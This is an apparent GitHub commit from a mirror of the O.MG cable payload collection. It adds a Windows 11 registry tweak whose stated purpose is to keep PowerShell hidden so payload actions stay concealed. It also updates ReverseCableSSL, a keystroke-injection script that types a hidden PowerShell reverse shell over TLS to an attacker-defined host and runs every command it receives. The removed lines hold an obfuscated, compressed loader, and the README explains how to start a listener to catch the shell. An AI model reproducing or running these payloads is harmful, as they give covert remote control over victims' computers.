mirror of https://github.com/hak5/omg-payloads.git
Merge pull request #133 from 0iphor13/master
Uploaded Windows11_CommandPrompt_Downgrade + Updated ReverseCableSSLpull/216/head
Kalani Helekunihi
GitHub
commit
b5150019fb
|
|
@ -0,0 +1,27 @@
|
|||
**Title: Windows11_CommandPrompt_Downgrade**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
OS: Windows11<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is Windows11_CommandPrompt_Downgrade?**
|
||||
|
||||
*It is pretty simple to explain... In Windows 11 22H2, the default app used to host console windows has been changed to Windows Terminal. After the October 2022 update, Command Prompt, Windows PowerShell, and other console apps will appear inside an instance of Windows Terminal[(Reference)](https://support.microsoft.com/en-us/windows/command-prompt-and-windows-powershell-for-windows-11-6453ce98-da91-476f-8651-5c14d5777c20). This causes Powershell not using the parameter `-WindowStyle hidden` properly, resulting in Powershell just minimizing instead of properly hiding itself*
|
||||
|
||||
By default this payload reverts the default app to Conhost, fixing the hidden powershell. You may intergrate this to properly hide your payloads actions again.
|
||||
Other values are also provided for a backup solution or simply to tinker around with it.
|
||||
|
||||
**Instruction: Downgrade to Conshost**
|
||||
|
||||
This by default is already configured and plug&play.
|
||||
- Change line 35 to beeing `CommandPrompt_Downgrade(#CONHOST,#CONHOST)`
|
||||
|
||||
**Instruction: Using Windows Default**
|
||||
|
||||
- Change line 35 to beeing `CommandPrompt_Downgrade(#AUTOMATIC,#AUTOMATIC)`
|
||||
|
||||
**Instruction: Using Terminal App**
|
||||
|
||||
- Change line 35 to beeing `CommandPrompt_Downgrade(#TERMINAL_DC,#TERMINAL_DT)`
|
||||
|
||||
_Note: This changes values in the registry._
|
||||
|
|
@ -0,0 +1,35 @@
|
|||
REM Windows11_CommandPrompt_Downgrade
|
||||
REM Version 1.0
|
||||
REM OS: Windows11
|
||||
REM Author: 0iphor13
|
||||
REM Requirements: OMG Firmware v.3.0 or higher
|
||||
REM Changing the Command Prompt to Conhost, to enable hidden Powershell for certain W11 Builds.
|
||||
REM Other Methods values are also provided for backup or simply playing around.
|
||||
|
||||
|
||||
REM Define your language below
|
||||
DUCKY_LANG de
|
||||
|
||||
REM Value for Conhost
|
||||
DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D
|
||||
|
||||
REM Value for default usage
|
||||
DEFINE #AUTOMATIC 00000000-0000-0000-0000-000000000000
|
||||
|
||||
REM Values for Windows Terminal
|
||||
DEFINE #TERMINAL_DC 2EACA947-7F5F-4CFA-BA87-8F7FBEEFBE69
|
||||
DEFINE #TERMINAL_DT E12CFF52-A866-4C77-9A90-F570A7AA2C6B
|
||||
|
||||
REM Function for executing Powershell and changing registry values
|
||||
FUNCTION CommandPrompt_Downgrade(#VAR1, #VAR2)
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell -NoP -NonI
|
||||
DELAY 1000
|
||||
STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#VAR1}";
|
||||
STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#VAR2}";exit
|
||||
END_FUNCTION
|
||||
|
||||
REM Insert desired values below.
|
||||
CommandPrompt_Downgrade(#CONHOST,#CONHOST)
|
||||
|
|
@ -2,8 +2,8 @@
|
|||
|
||||
<p>Author: 0iphor13<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: OMG Firmware v.2.5 or higher</p>
|
||||
Version: 2.0<br>
|
||||
Requirements: OMG Firmware v.3.0 or higher</p>
|
||||
|
||||
**What is ReverseCableSSL?**
|
||||
#
|
||||
|
|
@ -12,17 +12,17 @@ Unlike ReverseCable, ReverseCableSSL offers encrypted traffic via OpenSSL.</p>
|
|||
|
||||
|
||||
**Instruction:**
|
||||
<p>!!!Insert the IP of your attacking machine & PORT into the payload at the beginning!!!<br>
|
||||
1. Create key.pem & cert.pem like so: <br>
|
||||
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
|
||||
It will ask for information about the certificate - Insert whatever you want.<br>
|
||||
- Define your host address and port at #ADDRESS and #PORT<br>
|
||||
- Create key.pem & cert.pem like so: <br>
|
||||
```openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes```
|
||||
<p>It will ask for information about the certificate - Insert whatever you want.</p>
|
||||
|
||||
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
|
||||
- For catching the shell you need to start a listener, which supports encrypted traffic.<br>
|
||||
I recommend openssl itself or ncat - Example syntax for both:<br>
|
||||
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
|
||||
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
|
||||
|
||||
3. Plug in Cable.
|
||||
- Plug in Cable.
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -1,38 +1,43 @@
|
|||
REM ReverseCableSSL
|
||||
REM Version 1.0
|
||||
REM Version 2.0
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Requirements: OMG Firmware v.2.5 or higher
|
||||
REM Requirements: OMG Firmware v.3.0 or higher
|
||||
|
||||
REM Getting encrypted remote access via obfuscated powershell code
|
||||
REM Getting encrypted remote access via powershell
|
||||
|
||||
REM Define your receiving Host below
|
||||
DEFINE #ADDRESS '0.0.0.0'
|
||||
DEFINE #PORT 4444
|
||||
|
||||
FUNCTION Detect_Finished()
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
END_FUNCTION
|
||||
|
||||
DELAY 500
|
||||
REM Define your language below
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -w hidden
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING $IP='0.0.0.0';$PORT=PORT;( -joIn [reGEX]::mAtcHeS( (")''NIOj-'X'+]3,1[)(gnirtsOt.ecNErefeRpesobreV$ "+'('+'& '+(('b'+'8'+'J ')-crepLAce 'b8J',[ChAR]124)+")'$','8yj'(EcalpER.)'|',)801]RaHC[+021]RaHC[+25]RaHC[((EcalpER.)93]RaHC[]GniRtS[,)501]RaHC[+07]RaHC[+18]RaHC[((EcalpER.)')iFQiFQNIO
|
||||
STRINGLN powershell -NoP -NonI -W H
|
||||
DELAY 1000
|
||||
STRING $01=[Text.Encoding]::ASCII.GetBytes("`n[+] Connection received - O.MG@$env:USERNAME/$env:COMPUTERNAME `n`n");
|
||||
DEFINE #VAR #DfdGgfdbOMG
|
||||
STRING $c=new-OBJecT Net.Sockets.TcpClient(#ADDRESS,#PORT);
|
||||
STRING $s=$c.GetStream();
|
||||
DEFINE #DfdGgfdbOMG NeW-oBjECt
|
||||
STRING $sSL=#DfdGgfdbOMG System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
|
||||
STRING $sSL.AuthenticateAsClient('01phOri3.omg', $null, "Tls12", $false);
|
||||
STRING $w=#VAR System.IO.StreamWriter($sSL);$sSL.write($01,0,$01.Length);$w.Write('OMG@PS ' + (pwd).Path + '> ');$w.flush();[byte[]]$b = 0..65535|%{0};while(($i=$sSL.Read($b, 0, $b.Length)) -ne 0)
|
||||
STRING {$D=(#DfdGgfdbOMG -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$Y=(iex $D | Out-String ) 2>&1;
|
||||
STRING $X=$Y + 'OMG@PS ' + (Get-LoCatIon).Path + '> ';
|
||||
STRINGLN $Z=([text.encoding]::ASCII).GetBytes($X);$sSL.Write($Z,0,$Z.Length);$sSL.Flush()};exIT
|
||||
DELAY 100
|
||||
STRING j-]52,42,4[CEPS'+'moC:VNE8yj "+('(.{0'+'}+{0} ') -F [chAR]39+'l'+'x4) '+'(Dne'+'OTDAer'+'.'+') '+(')'+'II'+'CSa::'+']g'+'nidoCNE.tX{'+'0}+{'+'0'+'}e'+'T.M'+'eTS'+'ys[, ') -F[cHaR]39+'))Ss'+'ErPMoceD::]EDo'+'MNO'+'iSsErpMOc.'+'No'+'is'+'s'+'ERpmoc.'+'OI'+'.met'+'SY'+'s'+'[ '+', '+('{0}+'+'{'+'0})
|
||||
DELAY 100
|
||||
STRING iFQ'+'==AA/hj'+'7zf1K/Vp7dl46NLLtuomB'+'Vjldn'+'vd'+'O7Q'+'uWq1vWq'+'dEK4{'+'0'+'}+{0}'+'2LO1C1nN'+'J'+'KbGpPgNZ2{0}+{'+'0}kcRl'+'w0TqY5392e'+'0VwS54cTkkC'+'5'+'s19h'+'3sI+Zgvt'+'7{0}+{'+'0}o29O7scluP{'+'0}'+'+{0}hkQQ'+'Wj'+'LZv'+'JBlFC'+'e'+'Th9'+'aG'+'5KLFOV'+'i/kg'+'Yxa'+'Nt'+'Et/1gZ'+'fyn4I
|
||||
DELAY 100
|
||||
STRING b99DLte{0}+'+'{0}hwi'+'1'+'m'+'gaGk'+'g5RTQ'+'F9'+'K'+'PhoE5w'+'Vfef0CI'+'yk'+'sf'+'4'+'69'+'AZdU'+'cTsit2F'+'ZaJnXjBzU'+'Dvn'+'LmXn'+'Lg{'+'0}'+'+{'+'0}'+'kF'+'denv8tt+2I/5'+'7vfyhfh0'+'q'+'YBe'+'fWqTbiG'+'2wsmzFoYrfq3du9'+'G2v'+'ni2Pxi'+'u5'+'E+rl2/kJ6h0z2DI'+'rdGbIEs'+'C'+'yY8I'+'9Qb'+'/'+'H
|
||||
DELAY 100
|
||||
STRING 4'+'pZVcpRQ6WNp'+'T'+'2bR00gHk85r'+'phUNFfbdAoeV7mI22'+'+6zpfqc'+'WTqo7zkk'+'OX'+'J'+'X6Qw'+'LdsnwdnrsQo'+'uWm'+'hzAA5IrSgng3'+'a'+'WtY18rl'+'AS/6dW68K'+'K'+'3VYR0rEv'+'6VI'+'pH2S{0}+{0}Nog'+'b'+'bcMsd'+'FGpbNXc'+'eCN'+'6tQ'+'MCri'+'gl'+'g'+'elpR'+'IPOhP'+'KeLGV'+'/'+'7p'+'J'+'ZJYq6+h'+'Ciet
|
||||
DELAY 100
|
||||
STRING n'+'Qt'+'MlG'+'EfB7'+'hP'+'o'+'nAgs'+'r{0}+{0}NR'+'gf8'+'oY8H3RInOlx1'+'DxbJxwL'+'x'+'NKIkcn'+'h{0}+{0}QUqm{0}+{0}uCo'+'qD7HGJr'+'Z/dmXH'+'aiYxDK'+'P+lv{0}+{'+'0}WFrEk'+'g{0'+'}+{0}A0PBo{0}+'+'{'+'0}wuOzmwVW'+'{0}+{0}UBS/{0}+{0}Y/'+'elW'+'+tHcXNgWO5'+'wBB/Mf'+'gle6u'+'Smr0{0}'+'+{0}gsQIzh8IcULL11
|
||||
DELAY 100
|
||||
STRING kglce'+'5F'+'Z7VWZMS3KxF'+'AE3w6co7'+'V'+'JdJSWTwI'+'TO'+'JjdtUmK'+'BDNYS'+'EpJPV'+'0Sqr'+'4Dwv'+'3'+'e'+'QZomXGG'+'J'+'7g/{'+'0}+{0'+'}9G'+'VsOAS2r0/'+'+{'+'0'+'}+{0}2N'+'xdKe3e9+efHiS{0}+'+'{0}'+'od3mfSY3'+'df3ftWM'+'bE'+'SNUWt'+'A'+'Hm+AiPaTCQ6A5q'+'Q4u'+'VrOk7mKl46E'+'Xsi'+'I8ve2PEwo'+'9bv
|
||||
DELAY 100
|
||||
STRING P'+'VfiFQ ')-F [chAR]39+('(gN'+'I'+'R'+'Ts4'+'6EsAbmorFrNf'+'+rNf::]TREvn'+'oC'+'[ ').replace('rNf',[STRINg][CHar]39)+((']'+'mAEr'+'TSyroMem'+'.oI'+'.m6j'+'x+6'+'jx'+'et'+'SY'+'s6jx+6jx[ ')-rEPLaCe '6jx',[Char]39)+('(MaFy'+'5+Fy5E'+'RTS'+'F'+'y5'+'+F'+'y5'+'EtAlf'+'Ed.noi'+'S'+'SERP'+'F
|
||||
DELAY 100
|
||||
STRING y'+'5'+'+Fy5M'+'O'+'C.Oi ').replACE('Fy5',[STRINg][ChAr]39)+'tc'+'ejBO'+'-weN '+'( '+(('(rE'+'dA'+'eRmAE'+'P5'+'d+P5dr'+'P5d+P'+'5dTS'+'.oI ') -repLaCE 'P5d',[CHAr]39)+('tcejBORrV+Rr'+'V-'+'weNRr'+'V'+'+RrV('+' ').RepLace('RrV',[STrING][cHaR]39)+('XI'+'B( ').RePlAce(([chAR]88+[chAR]73+[chAR]6
|
||||
DELAY 100
|
||||
STRING 6),[STrIng][chAR]39)+''), '.' , ('RI'+'G'+'HTtoLefT')) )| IeX
|
||||
DELAY 200
|
||||
ENTER
|
||||
Detect_Finished()
|
||||
|
|
|
|||
Loading…
Reference in New Issue